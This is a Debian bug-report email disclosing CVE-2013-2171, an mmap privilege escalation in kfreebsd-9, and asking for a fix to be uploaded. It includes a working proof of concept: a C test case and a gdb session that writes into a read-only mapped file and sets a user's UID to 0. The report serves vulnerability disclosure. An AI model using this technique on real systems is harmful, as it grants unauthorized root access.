Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Hi Christoph,
Please could you do an upload of SVN r4525 to unstable?
kfreebsd-9 as shipped with wheezy is indeed vulnerable and I can confirm
now that the fix works too.
Unfortunately the vulnerability is as simple and as serious as it
sounds. A non-privileged user can overwrite any file having only read
permissions.
# cat /etc/foo
steven:x:1000:1000:,,,:/home/steven:/bin/bash
$ gdb testcase
(gdb) run
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400631 in main () at main.c:13
13 *ptr = 0; /* this will segfault */
(gdb) set {char}(ptr+9) = 0x30
(gdb)
# cat /etc/foo
steven:x:0000:1000:,,,:/home/steven:/bin/bash
Regards,
--
Steven Chamberlain
steven@pyro.eu.org
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void) {
    /* A file the unprivileged user can only read (e.g. root-owned, mode 0644). */
    FILE *fp = fopen("/etc/foo", "r");
    if (fp == NULL) return -1;
    int fd = fileno(fp);
    /* Read-only shared mapping of the file; a write to it must fault on a fixed kernel. */
    unsigned char *ptr = mmap(NULL, 4096, PROT_READ, MAP_SHARED, fd, 0);
    if (ptr == MAP_FAILED) return -1;
    *ptr = 0; /* this will segfault; the gdb session above then modifies the mapping */
    return 0;
}